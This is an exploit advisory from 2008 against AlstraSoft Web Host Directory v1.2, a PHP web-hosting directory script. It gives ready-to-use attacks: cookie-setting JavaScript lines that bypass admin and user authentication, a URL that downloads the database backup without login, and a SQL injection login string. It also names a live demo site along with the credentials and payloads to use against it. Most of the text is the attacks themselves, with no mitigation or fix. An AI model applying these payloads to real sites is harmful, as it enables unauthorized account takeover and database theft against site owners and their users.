============================================================================== _ _ _ _ _ _ / \ | | | | / \ | | | | / _ \ | | | | / _ \ | |_| | / ___ \ | |___ | |___ / ___ \ | _ | IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| ============================================================================== ____ _ _ _ _ ___ _ __ / ___| | || | | \ | | / _ \ | |/ / | | _ | || |_ | \| | | | | | | ' / | |_| | |__ _| | |\ | | |_| | | . \ \____| |_| |_| \_| \___/ |_|\_\ ============================================================================== AlstraSoft Web Host Directory v1.2 Multiple Vulnerabilities ============================================================================== [»] Script: [ AlstraSoft Web Host Directory v1.2 ] [»] Language: [ PHP ] [»] Website: [ http://alstrasoft.com/webhost.htm ] [»] Type: [ Commercial ] [»] Report-Date: [ 14.11.2008 ] [»] Founder: [ G4N0K ] ===[ DTLZ ]=== [0] Insecure Cookie Handling [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ [»] javascript:document.cookie = "adm=1"; [!] users Auth bypass [»] javascript:document.cookie = "logged=[username]"; javascript:document.cookie = "logged=g4n0k"; [1] Arbitrary Database Backup [!] we can download a Backup of Database. [»] http://localhost/[paht]/admin/backup/db [2] SQLi Auth Bypass [»] Username : [a_valid_username] [»] Password : ' OR ' 1=1-- ===[ LIVE ]=== [»] http://www.hyperstop.com/demo/webhost/ username: testtest password: ' OR ' 1=1-- javascript:document.cookie = "logged=testtest"; ===[ Greetz ]=== [»] ALLAH [»] Tornado2800 [»] Hussain-X //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) //ALLAH,forgimme... =============================================================================== exit(); ===============================================================================